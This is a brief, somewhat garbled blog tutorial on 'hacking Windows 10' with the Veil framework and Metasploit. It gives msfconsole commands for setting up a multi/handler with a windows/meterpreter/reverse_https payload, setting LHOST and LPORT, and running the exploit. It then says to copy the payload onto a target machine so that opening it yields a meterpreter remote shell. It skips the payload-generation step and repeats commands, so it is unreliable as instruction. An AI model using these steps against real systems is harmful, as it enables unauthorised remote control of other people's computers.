Veil 3.0 Github Tutorials
In this article we are going to discuss how to hack windows 10 using veil framework . so lets begin
now open the terminator and get ready to put the command msfconsole
Now open the payload in your file location by searching it
Now put the command use exploit/multi/handler
Now put the command show options
Now put the command set payload windows/meterpreter/reverse_ https
Now put the command set LHOST (ip address)
You can gather ip address by opening and the command and putting the command ifconfig
Now put the command set LPORT 8080
Now put the command show options
Now put the command exploit
Now you should copy your payload in your base machines
Now if you open the payload it will be infected.
It will detect in meterpreter
Now to get the information put the command sysinfo
Now put the command show options and it will show all options
Now to show all options put the command help
0 Comments